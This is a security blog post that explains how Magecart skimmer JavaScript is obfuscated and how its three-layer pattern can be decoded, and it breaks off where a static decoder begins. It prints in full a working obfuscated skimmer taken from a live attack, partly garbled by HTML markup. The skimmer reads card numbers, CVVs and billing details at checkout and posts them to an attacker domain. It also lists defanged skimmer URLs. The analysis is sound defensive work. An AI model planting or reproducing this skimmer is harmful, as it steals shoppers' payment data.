Analyzing Magecart Malware – From Zero to Hero
Guy Bary

JavaScript obfuscation is not a new trend, but it is widely used today to hide malware code in many websites. This post is for technical readers who want to understand Magecart’s common obfuscation pattern and ways to decode it.
As websites get more and more complex, we see an increasing number of sites that are being compromised by malicious code injections, also commonly known as Magecart or digital skimming attacks. These attacks are designed to steal user data such as credit card numbers from websites, and if left unchecked, can result in significant data breaches and huge fines for the website owner.
Magecart attacks often go unnoticed for weeks, months or even years. One reason that they escape scrutiny is that the injected JavaScript code is heavily obfuscated, making it hard to detect malicious script actions and data leaking to unauthorized domains. However, a significant number of these obfuscated scripts seem to share a pattern.
Obfuscation
“the action of making something less clear and less easy to understand, especially intentionally” – Cambridge Dictionary
Take a look at this Magecart attack sample. The code steals credit card details from users, and it comes from an ongoing attack.
var _0x34d5 = [
  "Q29udGVudC1UeXBl",
  "YXBwbGljYXRpb24veC13d3ctZm9ybS11cmxlbmNvZGVk",
  "c2V0UHVibGljS2V5",
  "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",
  "ZW5jcnlwdA==",
  "c2VuZA==",
  "cGxhY2Vfb3JkZXI=",
  "cGxhY2Utb3JkZXI=",
  "cGF5bWVudC1idXR0b25zLWNvbnRhaW5lcg==",
  "YmlsbGluZy1idXR0b25zLWNvbnRhaW5lcg==",
  "cmV2aWV3LWJ1dHRvbnMtY29udGFpbmVy",
  "bGVuZ3Ro",
  "W2lkKj0n",
  "cXVlcnlTZWxlY3RvckFsbA==",
  "YWRkRXZlbnRMaXN0ZW5lcg==",
  "Y2xpY2s=",
  "YnRuLWNoZWNrb3V0",
  "W2NsYXNzKj0n",
  "bG9hZA==",
  "aG9zdG5hbWU=",
  "bG9jYXRpb24=",
  "aW5wdXQ=",
  "aW5kZXhPZg==",
  "X2NjX251bWJlcg==",
  "c3Vic3Ry",
  "dm1fY2NfbnVtYmVy",
  "Z2V0RWxlbWVudEJ5SWQ=",
  "dmFsdWU=",
  "dm1fZXhwaXJhdGlvbg==",
  "X2V4cGlyYXRpb24=",
  "dm1fZXhwaXJhdGlvbl95cg==",
  "X2V4cGlyYXRpb25feXI=",
  "dm1fY2NfY2lk",
  "X2NjX2NpZA==",
  "X2NjX2V4cF9tb250aA==",
  "X2NjX2V4cF95ZWFy",
  "X2NjX2N2dg==",
  "Zmlyc3RuYW1l",
  "bGFzdG5hbWU=",
  "ZW1haWw=",
  "c3RyZWV0MQ==",
  "c3RyZWV0Mg==",
  "Y2l0eQ==",
  "cmVnaW9uX2lk",
  "Y291bnRyeV9pZA==",
  "cG9zdGNvZGU=",
  "dGVsZXBob25l",
  "YmlsbGluZzo=",
  "c3RyaW5naWZ5",
  "dHBzOi8vbGlnaHRnZXRqcy5jb20=",
  "b3Blbg==",
  "UE9TVA==",
  "c2V0UmVxdWVzdEhlYWRlcg==",
];
(function(_0x110cd2, _0xa263bd) {
  var _0x352891 = function(_0x76a704) {
    while (--_0x76a704) {
      _0x110cd2["push"](_0x110cd2["shift"]());
    }
  };
  _0x352891(++_0xa263bd);
})(_0x34d5, 0xa5);
var _0x47fb = function(_0x522b23, _0x4fa39c) {
  _0x522b23 = _0x522b23 - 0x0;
  var _0xdb42df = _0x34d5[_0x522b23];
  if (_0x47fb["IyfmVK"] === undefined) {
    (function() {
      var _0x28a5cc = function() {
        var _0x3f5c15;
        try {
          _0x3f5c15 = Function("return\x20(function()\x20" + "{}.constructor(\x22return\x20this\x22)(\x20)" + ");")();
        } catch (_0x7f7a59) {
          _0x3f5c15 = window;
        }
        return _0x3f5c15;
      };
      var _0x1a2269 = _0x28a5cc();
      var _0x2009de = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";
      _0x1a2269["atob"] ||
        (_0x1a2269["atob"] = function(_0x2633f6) {
          var _0x1bf8c8 = String(_0x2633f6)["replace"](/=+$/, "");
          for (
            var _0x4e57f1 = 0x0, _0x5122c7, _0x5cb7d8, _0x2540b4 = 0x0, _0x140365 = "";
            (_0x5cb7d8 = _0x1bf8c8["charAt"](_0x2540b4++));
            ~_0x5cb7d8 && ((_0x5122c7 = _0x4e57f1 % 0x4 ? _0x5122c7 * 0x40 + _0x5cb7d8 : _0x5cb7d8), _0x4e57f1++ % 0x4)
              ? (_0x140365 += String["fromCharCode"](0xff & (_0x5122c7 >> ((-0x2 * _0x4e57f1) & 0x6))))
              : 0x0
          ) {
            _0x5cb7d8 = _0x2009de["indexOf"](_0x5cb7d8);
          }
          return _0x140365;
        });
    })();
    _0x47fb["cJuRna"] = function(_0x55fba5) {
      var _0xfd7af3 = atob(_0x55fba5);
      var _0x953b7b = [];
      for (var _0x192361 = 0x0, _0x1f2b27 = _0xfd7af3["length"]; _0x192361 < _0x1f2b27; _0x192361++) {
        _0x953b7b += "%" + ("00" + _0xfd7af3["charCodeAt"](_0x192361)["toString"](0x10))["slice"](-0x2);
      }
      return decodeURIComponent(_0x953b7b);
    };
    _0x47fb["naGzua"] = {};
    _0x47fb["IyfmVK"] = !![];
  }
  var _0x11ff5c = _0x47fb["naGzua"][_0x522b23];
  if (_0x11ff5c === undefined) {
    _0xdb42df = _0x47fb["cJuRna"](_0xdb42df);
    _0x47fb["naGzua"][_0x522b23] = _0xdb42df;
  } else {
    _0xdb42df = _0x11ff5c;
  }
  return _0xdb42df;
};
function readyr() {
  try {
    var _0x5bbf66 = [_0x47fb("0x0"), _0x47fb("0x1"), _0x47fb("0x2"), _0x47fb("0x3"), _0x47fb("0x4")];
    var _0x8475c0 = _0x5bbf66[_0x47fb("0x5")];
    for (var _0x2e623e = 0x0; _0x2e623e < _0x8475c0; _0x2e623e++) {
      f = _0x5bbf66[_0x2e623e];
      try {
        k = _0x47fb("0x6") + f + "\x27]";
        var _0x7ddc45 = document[_0x47fb("0x7")](k),
          _0x5d458a = 0x0;
        for (; _0x5d458a < _0x7ddc45[_0x47fb("0x5")]; _0x5d458a++) {
          _0x7ddc45[_0x5d458a][_0x47fb("0x8")](_0x47fb("0x9"), bts);
        }
      } catch (_0x375bef) {}
    }
  } catch (_0x36add6) {}
  try {
    var _0x5bbf66 = [_0x47fb("0xa")];
    var _0x8475c0 = _0x5bbf66[_0x47fb("0x5")];
    for (var _0x2e623e = 0x0; _0x2e623e < _0x8475c0; _0x2e623e++) {
      f = _0x5bbf66[_0x2e623e];
      try {
        k = _0x47fb("0xb") + f + "\x27]";
        var _0x7ddc45 = document[_0x47fb("0x7")](k),
          _0x5d458a = 0x0;
        for (; _0x5d458a < _0x7ddc45[_0x47fb("0x5")]; _0x5d458a++) {
          _0x7ddc45[_0x5d458a][_0x47fb("0x8")](_0x47fb("0x9"), bts);
        }
      } catch (_0x24b4f5) {}
    }
  } catch (_0x196a93) {}
}
window[_0x47fb("0x8")](_0x47fb("0xc"), readyr);
setInterval(bts, 0x7d0);
var vvk = "";
function bts() {
  try {
    var _0x34f9e9 = {};
    _0x34f9e9[_0x47fb("0xd")] = window[_0x47fb("0xe")][_0x47fb("0xd")];
    var _0x4a60b2 = document[_0x47fb("0x7")](_0x47fb("0xf"));
<span class="token keyword">var</span> _0x570cfd <span class="token operator">=</span> _0x4a60b2<span class="token punctuation">[</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x5"</span><span class="token punctuation">)</span><span class="token punctuation">]</span><span class="token punctuation">;</span>
<span class="token keyword">var</span> _0x57a5b3 <span class="token operator">=</span> <span class="token string">""</span><span class="token punctuation">;</span>
<span class="token keyword">for</span> <span class="token punctuation">(</span><span class="token keyword">var</span> _0x1e5f96 <span class="token operator">=</span> <span class="token number">0x0</span><span class="token punctuation">;</span> _0x1e5f96 <span class="token operator"><</span> _0x570cfd<span class="token punctuation">;</span> _0x1e5f96<span class="token operator">++</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
el <span class="token operator">=</span> _0x4a60b2<span class="token punctuation">[</span>_0x1e5f96<span class="token punctuation">]</span><span class="token punctuation">[</span><span class="token string">"id"</span><span class="token punctuation">]</span><span class="token punctuation">;</span>
pos <span class="token operator">=</span> el<span class="token punctuation">[</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x10"</span><span class="token punctuation">)</span><span class="token punctuation">]</span><span class="token punctuation">(</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x11"</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token keyword">if</span> <span class="token punctuation">(</span>pos <span class="token operator">></span> <span class="token number">0x0</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
_0x57a5b3 <span class="token operator">=</span> el<span class="token punctuation">[</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x12"</span><span class="token punctuation">)</span><span class="token punctuation">]</span><span class="token punctuation">(</span><span class="token number">0x0</span><span class="token punctuation">,</span> pos<span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token punctuation">}</span>
<span class="token punctuation">}</span>
<span class="token keyword">if</span> <span class="token punctuation">(</span><span class="token operator">!</span>_0x57a5b3<span class="token punctuation">)</span> <span class="token keyword">return</span><span class="token punctuation">;</span>
<span class="token keyword">var</span> _0x553440 <span class="token operator">=</span> _0x57a5b3<span class="token punctuation">;</span>
<span class="token keyword">try</span> <span class="token punctuation">{</span>
_0x34f9e9<span class="token punctuation">[</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x13"</span><span class="token punctuation">)</span><span class="token punctuation">]</span> <span class="token operator">=</span> document<span class="token punctuation">[</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x14"</span><span class="token punctuation">)</span><span class="token punctuation">]</span><span class="token punctuation">(</span>_0x553440 <span class="token operator">+</span> <span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x11"</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">[</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x15"</span><span class="token punctuation">)</span><span class="token punctuation">]</span><span class="token punctuation">;</span>
<span class="token punctuation">}</span> <span class="token keyword">catch</span> <span class="token punctuation">(</span>_0x1f7150<span class="token punctuation">)</span> <span class="token punctuation">{</span><span class="token punctuation">}</span>
<span class="token keyword">if</span> <span class="token punctuation">(</span><span class="token operator">!</span>_0x34f9e9<span class="token punctuation">[</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x13"</span><span class="token punctuation">)</span><span class="token punctuation">]</span><span class="token punctuation">)</span> <span class="token keyword">return</span><span class="token punctuation">;</span>
<span class="token keyword">try</span> <span class="token punctuation">{</span>
_0x34f9e9<span class="token punctuation">[</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x16"</span><span class="token punctuation">)</span><span class="token punctuation">]</span> <span class="token operator">=</span> document<span class="token punctuation">[</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x14"</span><span class="token punctuation">)</span><span class="token punctuation">]</span><span class="token punctuation">(</span>_0x553440 <span class="token operator">+</span> <span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x17"</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">[</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x15"</span><span class="token punctuation">)</span><span class="token punctuation">]</span><span class="token punctuation">;</span>
<span class="token punctuation">}</span> <span class="token keyword">catch</span> <span class="token punctuation">(</span>_0x136215<span class="token punctuation">)</span> <span class="token punctuation">{</span><span class="token punctuation">}</span>
<span class="token keyword">try</span> <span class="token punctuation">{</span>
_0x34f9e9<span class="token punctuation">[</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x18"</span><span class="token punctuation">)</span><span class="token punctuation">]</span> <span class="token operator">=</span> document<span class="token punctuation">[</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x14"</span><span class="token punctuation">)</span><span class="token punctuation">]</span><span class="token punctuation">(</span>_0x553440 <span class="token operator">+</span> <span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x19"</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">[</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x15"</span><span class="token punctuation">)</span><span class="token punctuation">]</span><span class="token punctuation">;</span>
<span class="token punctuation">}</span> <span class="token keyword">catch</span> <span class="token punctuation">(</span>_0x4ab22b<span class="token punctuation">)</span> <span class="token punctuation">{</span><span class="token punctuation">}</span>
<span class="token keyword">try</span> <span class="token punctuation">{</span>
_0x34f9e9<span class="token punctuation">[</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x1a"</span><span class="token punctuation">)</span><span class="token punctuation">]</span> <span class="token operator">=</span> document<span class="token punctuation">[</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x14"</span><span class="token punctuation">)</span><span class="token punctuation">]</span><span class="token punctuation">(</span>_0x553440 <span class="token operator">+</span> <span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x1b"</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">[</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x15"</span><span class="token punctuation">)</span><span class="token punctuation">]</span><span class="token punctuation">;</span>
<span class="token punctuation">}</span> <span class="token keyword">catch</span> <span class="token punctuation">(</span>_0x4df1f0<span class="token punctuation">)</span> <span class="token punctuation">{</span><span class="token punctuation">}</span>
<span class="token keyword">try</span> <span class="token punctuation">{</span>
<span class="token keyword">if</span> <span class="token punctuation">(</span><span class="token operator">!</span>_0x34f9e9<span class="token punctuation">[</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x16"</span><span class="token punctuation">)</span><span class="token punctuation">]</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
_0x34f9e9<span class="token punctuation">[</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x16"</span><span class="token punctuation">)</span><span class="token punctuation">]</span> <span class="token operator">=</span> document<span class="token punctuation">[</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x14"</span><span class="token punctuation">)</span><span class="token punctuation">]</span><span class="token punctuation">(</span>_0x553440 <span class="token operator">+</span> <span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x1c"</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">[</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x15"</span><span class="token punctuation">)</span><span class="token punctuation">]</span><span class="token punctuation">;</span>
<span class="token punctuation">}</span>
<span class="token punctuation">}</span> <span class="token keyword">catch</span> <span class="token punctuation">(</span>_0x90cd50<span class="token punctuation">)</span> <span class="token punctuation">{</span><span class="token punctuation">}</span>
<span class="token keyword">try</span> <span class="token punctuation">{</span>
<span class="token keyword">if</span> <span class="token punctuation">(</span><span class="token operator">!</span>_0x34f9e9<span class="token punctuation">[</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x18"</span><span class="token punctuation">)</span><span class="token punctuation">]</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
_0x34f9e9<span class="token punctuation">[</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x18"</span><span class="token punctuation">)</span><span class="token punctuation">]</span> <span class="token operator">=</span> document<span class="token punctuation">[</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x14"</span><span class="token punctuation">)</span><span class="token punctuation">]</span><span class="token punctuation">(</span>_0x553440 <span class="token operator">+</span> <span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x1d"</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">[</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x15"</span><span class="token punctuation">)</span><span class="token punctuation">]</span><span class="token punctuation">;</span>
<span class="token punctuation">}</span>
<span class="token punctuation">}</span> <span class="token keyword">catch</span> <span class="token punctuation">(</span>_0x188c28<span class="token punctuation">)</span> <span class="token punctuation">{</span><span class="token punctuation">}</span>
<span class="token keyword">try</span> <span class="token punctuation">{</span>
<span class="token keyword">if</span> <span class="token punctuation">(</span><span class="token operator">!</span>_0x34f9e9<span class="token punctuation">[</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x1a"</span><span class="token punctuation">)</span><span class="token punctuation">]</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
_0x34f9e9<span class="token punctuation">[</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x1a"</span><span class="token punctuation">)</span><span class="token punctuation">]</span> <span class="token operator">=</span> document<span class="token punctuation">[</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x14"</span><span class="token punctuation">)</span><span class="token punctuation">]</span><span class="token punctuation">(</span>_0x553440 <span class="token operator">+</span> <span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x1e"</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">[</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x15"</span><span class="token punctuation">)</span><span class="token punctuation">]</span><span class="token punctuation">;</span>
<span class="token punctuation">}</span>
<span class="token punctuation">}</span> <span class="token keyword">catch</span> <span class="token punctuation">(</span>_0x32a59b<span class="token punctuation">)</span> <span class="token punctuation">{</span><span class="token punctuation">}</span>
<span class="token keyword">var</span> _0x1e9e38 <span class="token operator">=</span> <span class="token number">0x0</span><span class="token punctuation">;</span>
<span class="token keyword">if</span> <span class="token punctuation">(</span>_0x34f9e9<span class="token punctuation">[</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x13"</span><span class="token punctuation">)</span><span class="token punctuation">]</span><span class="token punctuation">[</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x5"</span><span class="token punctuation">)</span><span class="token punctuation">]</span> <span class="token operator">==</span> <span class="token number">0xf</span> <span class="token operator">&&</span> _0x34f9e9<span class="token punctuation">[</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x1a"</span><span class="token punctuation">)</span><span class="token punctuation">]</span><span class="token punctuation">[</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x5"</span><span class="token punctuation">)</span><span class="token punctuation">]</span> <span class="token operator">></span> <span class="token number">0x3</span><span class="token punctuation">)</span>
_0x1e9e38 <span class="token operator">=</span> <span class="token number">0x1</span><span class="token punctuation">;</span>
<span class="token keyword">if</span> <span class="token punctuation">(</span>_0x34f9e9<span class="token punctuation">[</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x13"</span><span class="token punctuation">)</span><span class="token punctuation">]</span><span class="token punctuation">[</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x5"</span><span class="token punctuation">)</span><span class="token punctuation">]</span> <span class="token operator">></span> <span class="token number">0xf</span> <span class="token operator">&&</span> _0x34f9e9<span class="token punctuation">[</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x1a"</span><span class="token punctuation">)</span><span class="token punctuation">]</span><span class="token punctuation">[</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x5"</span><span class="token punctuation">)</span><span class="token punctuation">]</span> <span class="token operator">>=</span> <span class="token number">0x3</span><span class="token punctuation">)</span>
_0x1e9e38 <span class="token operator">=</span> <span class="token number">0x1</span><span class="token punctuation">;</span>
<span class="token keyword">if</span> <span class="token punctuation">(</span><span class="token operator">!</span>_0x1e9e38<span class="token punctuation">)</span> <span class="token keyword">return</span><span class="token punctuation">;</span>
<span class="token keyword">var</span> _0xe078a8 <span class="token operator">=</span> <span class="token punctuation">[</span>
<span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x1f"</span><span class="token punctuation">)</span><span class="token punctuation">,</span>
<span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x20"</span><span class="token punctuation">)</span><span class="token punctuation">,</span>
<span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x21"</span><span class="token punctuation">)</span><span class="token punctuation">,</span>
<span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x22"</span><span class="token punctuation">)</span><span class="token punctuation">,</span>
<span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x23"</span><span class="token punctuation">)</span><span class="token punctuation">,</span>
<span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x24"</span><span class="token punctuation">)</span><span class="token punctuation">,</span>
<span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x25"</span><span class="token punctuation">)</span><span class="token punctuation">,</span>
<span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x26"</span><span class="token punctuation">)</span><span class="token punctuation">,</span>
<span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x27"</span><span class="token punctuation">)</span><span class="token punctuation">,</span>
<span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x28"</span><span class="token punctuation">)</span><span class="token punctuation">,</span>
<span class="token punctuation">]</span><span class="token punctuation">;</span>
_0x570cfd <span class="token operator">=</span> _0xe078a8<span class="token punctuation">[</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x5"</span><span class="token punctuation">)</span><span class="token punctuation">]</span><span class="token punctuation">;</span>
<span class="token keyword">for</span> <span class="token punctuation">(</span><span class="token keyword">var</span> _0x1e5f96 <span class="token operator">=</span> <span class="token number">0x0</span><span class="token punctuation">;</span> _0x1e5f96 <span class="token operator"><</span> _0x570cfd<span class="token punctuation">;</span> _0x1e5f96<span class="token operator">++</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
_0x553440 <span class="token operator">=</span> _0xe078a8<span class="token punctuation">[</span>_0x1e5f96<span class="token punctuation">]</span><span class="token punctuation">;</span>
k <span class="token operator">=</span> <span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x29"</span><span class="token punctuation">)</span> <span class="token operator">+</span> _0x553440<span class="token punctuation">;</span>
<span class="token keyword">try</span> <span class="token punctuation">{</span>
_0x34f9e9<span class="token punctuation">[</span>_0x553440<span class="token punctuation">]</span> <span class="token operator">=</span> document<span class="token punctuation">[</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x14"</span><span class="token punctuation">)</span><span class="token punctuation">]</span><span class="token punctuation">(</span>k<span class="token punctuation">)</span><span class="token punctuation">[</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x15"</span><span class="token punctuation">)</span><span class="token punctuation">]</span><span class="token punctuation">;</span>
<span class="token punctuation">}</span> <span class="token keyword">catch</span> <span class="token punctuation">(</span>_0x12e01e<span class="token punctuation">)</span> <span class="token punctuation">{</span><span class="token punctuation">}</span>
<span class="token punctuation">}</span>
<span class="token keyword">if</span> <span class="token punctuation">(</span><span class="token operator">!</span>_0x34f9e9<span class="token punctuation">[</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x27"</span><span class="token punctuation">)</span><span class="token punctuation">]</span><span class="token punctuation">)</span> <span class="token keyword">return</span><span class="token punctuation">;</span>
<span class="token keyword">if</span> <span class="token punctuation">(</span>_0x1e9e38<span class="token punctuation">)</span> <span class="token punctuation">{</span>
_0x34f9e9 <span class="token operator">=</span> <span class="token constant">JSON</span><span class="token punctuation">[</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x2a"</span><span class="token punctuation">)</span><span class="token punctuation">]</span><span class="token punctuation">(</span>_0x34f9e9<span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token keyword">if</span> <span class="token punctuation">(</span>_0x34f9e9<span class="token punctuation">[</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x5"</span><span class="token punctuation">)</span><span class="token punctuation">]</span> <span class="token operator">==</span> vvk<span class="token punctuation">[</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x5"</span><span class="token punctuation">)</span><span class="token punctuation">]</span><span class="token punctuation">)</span> <span class="token keyword">return</span><span class="token punctuation">;</span>
vvk <span class="token operator">=</span> _0x34f9e9<span class="token punctuation">;</span>
<span class="token keyword">var</span> _0x4c73bd <span class="token operator">=</span> <span class="token keyword">new</span> <span class="token class-name">XMLHttpRequest</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
url <span class="token operator">=</span> <span class="token string">"ht"</span> <span class="token operator">+</span> <span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x2b"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
_0x4c73bd<span class="token punctuation">[</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x2c"</span><span class="token punctuation">)</span><span class="token punctuation">]</span><span class="token punctuation">(</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x2d"</span><span class="token punctuation">)</span><span class="token punctuation">,</span> url <span class="token operator">+</span> <span class="token string">""</span><span class="token punctuation">,</span> <span class="token operator">!</span><span class="token punctuation">[</span><span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
_0x4c73bd<span class="token punctuation">[</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x2e"</span><span class="token punctuation">)</span><span class="token punctuation">]</span><span class="token punctuation">(</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x2f"</span><span class="token punctuation">)</span><span class="token punctuation">,</span> <span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x30"</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token keyword">var</span> _0xd96713 <span class="token operator">=</span> <span class="token keyword">new</span> <span class="token class-name">JSEncrypt</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
_0xd96713<span class="token punctuation">[</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x31"</span><span class="token punctuation">)</span><span class="token punctuation">]</span><span class="token punctuation">(</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x32"</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token keyword">var</span> _0x5dc551 <span class="token operator">=</span> _0xd96713<span class="token punctuation">[</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x33"</span><span class="token punctuation">)</span><span class="token punctuation">]</span><span class="token punctuation">(</span>_0x34f9e9<span class="token punctuation">)</span><span class="token punctuation">;</span>
_0x4c73bd<span class="token punctuation">[</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x34"</span><span class="token punctuation">)</span><span class="token punctuation">]</span><span class="token punctuation">(</span><span class="token string">"k="</span> <span class="token operator">+</span> _0x5dc551<span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token punctuation">}</span>
<span class="token punctuation">}</span> <span class="token keyword">catch</span> <span class="token punctuation">(</span>_0x2661d6<span class="token punctuation">)</span> <span class="token punctuation">{</span><span class="token punctuation">}</span>
<span class="token punctuation">}</span>
The obfuscated code doesn’t make a lot of sense at first, but upon closer inspection we can see that it has a structure that repeats across many different Magecart scripts that we have analyzed. It uses two main techniques.
1. JavaScript syntax manipulation
This involves using any number of JavaScript language tricks to manipulate data (e.g., using non-decimal values for strings and numbers, randomizing variable names, using chained commas in return statements, etc.).
2. Common Obfuscation Pattern
This is a common JavaScript obfuscation pattern that we see repeated across many different Magecart attack scripts.
More Magecart samples:
- //cdndeskpro[.]com/mc[.]js
- //listrakjs[.]com/api[.]js
- //lightgetjs[.]com/light[.]js
The Magecart Pattern
Magecart code uses a classic obfuscation technique, which is also used by several legitimate obfuscation services. This technique is effective, but once you understand the common pattern, you can de-obfuscate it and uncover the logic.
The pattern contains three layers:
- Content Layer: a set of data tokens that require a decryption step to become the real data values.
- Decryption Layer: a function that gets a data key as a parameter (from the Logic layer) and gets the corresponding data token from the Content layer. The function decrypts the data token using a dedicated algorithm (e.g., window.atob) to retrieve the original data value.
- Logic Layer: the actual malware code. This code gets the real data values for its execution by calling the Decryption layer with data keys.
Pattern Overview
Notes
- Some obfuscation techniques don’t have a Content layer. In such cases, the Decryption layer parses data tokens directly from the Logic layer.
- Some obfuscation techniques might have more than one decryption function.
Example:
```javascript
//Content
const dataTokens = ["cGF0dGVybg==", "aGVsbG8="];
(function prepareContent(_dataTokens, shiftCount) {
  for (let i = 0; i < shiftCount; i++) {
    _dataTokens.push(_dataTokens.shift());
  }
})(dataTokens, 0x1);
//Decryption
function getRealValue(dataKey) {
  const realValue = atob(dataTokens[dataKey]);
  return realValue;
}
//Logic
run();
function run() {
  console.log(getRealValue(0x0) + " " + getRealValue(0x1)); //"hello pattern"
}
```
Content:
- dataTokens – an array of data tokens (cGF0dGVybg==, aGVsbG8=)
- prepareContent – a function that shifts the array once
Decryption:
- getRealValue(): a function that gets a data key from the Logic layer, retrieves the corresponding data token from the Content layer, and then executes window.atob on the data token to get the real data value.
Logic:
- Prints “hello pattern” using data keys (0x0, 0x1)
- getRealValue(0x0) -> “hello”
- getRealValue(0x1) -> “pattern”
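The three layers can be undone statically, treating the script purely as text and never evaluating it. The following is an added example, not code from the original post: it assumes `_0x`-prefixed identifiers, base64 tokens and a `})(array, count)` preparation call as in the sample on this page, and the sample script and every name in it are constructed.

```javascript
// Static decoder for the Content / Decryption / Logic pattern (Node.js).
// The sample is handled as text only; none of it is ever evaluated.

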